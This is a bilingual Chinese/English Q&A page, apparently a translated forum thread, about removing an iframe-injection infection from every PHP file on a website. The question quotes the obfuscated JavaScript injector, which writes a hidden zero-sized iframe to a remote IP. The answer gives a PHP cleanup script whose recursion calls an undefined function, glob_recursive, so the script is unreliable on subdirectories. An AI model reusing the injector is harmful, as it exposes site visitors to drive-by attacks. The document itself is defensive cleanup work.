如何从我网站上的所有php文件中删除iframe病毒 [英] How can i remove an iframe virus from all of php files on my website

问题描述

我有关于从我的php文件中删除病毒代码的问题。我的服务器中有超过1200个php文件，每个php文件都被病毒感染了。将此行添加到html输出的病毒代码

I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output

这里是病毒代码：

<tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|125||src|height|230|width|board||248|php|58|tag1|ram'.split('|'),0,{}))</script><tag5479347352></tag5479347352>

每个php文件中的代码如上。如何从每个PHP文件中删除此病毒代码？有没有快速的方法呢？

Above code in every single php file. How can i remove this virus code from every php file ? Is there a quick way for doing it?

推荐答案

你可以使用：

removeVirus.php

<?php

foreach(rglob("*.php") as $virusFile){

    $withVirus = file_get_contents($virusFile);
    $withoutVirus = preg_replace('%<tag\d+>.*</tag\d+>%', '', $withVirus);
    file_put_contents($virusFile, $withoutVirus);
}

function rglob($pattern, $flags = 0){
// forked from https://github.com/rodurma/PHP-Functions/
    // blob/master/glob_recursive.php
  $files = glob($pattern, $flags);

  foreach (glob(dirname($pattern).'/*', 
    GLOB_ONLYDIR|GLOB_NOSORT) as $dir){
    $files = array_merge($files, glob_recursive
        ($dir.'/'.basename($pattern), $flags));
  }
  return $files;
}

---

用法：

在您网站的 root 上放置 removeVirus.php 从shell执行 root （或作为文件的所有者）

put removeVirus.php on the root of your website and execute from the shell as root (or as the owner of the files)

php removeVirus.php

---

注意：

1 - 我在我的服务器上测试了包含病毒的10 php 文件的代码，它按预期工作。

1 - I've tested the code on my server with 10 php files containing the virus and it worked as intended.

2 - 确保找到黑客的来源并相应地修补你的系统。

2 - Make sure you find the source of the hack and patch your system accordingly.

这篇关于如何从我网站上的所有php文件中删除iframe病毒的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！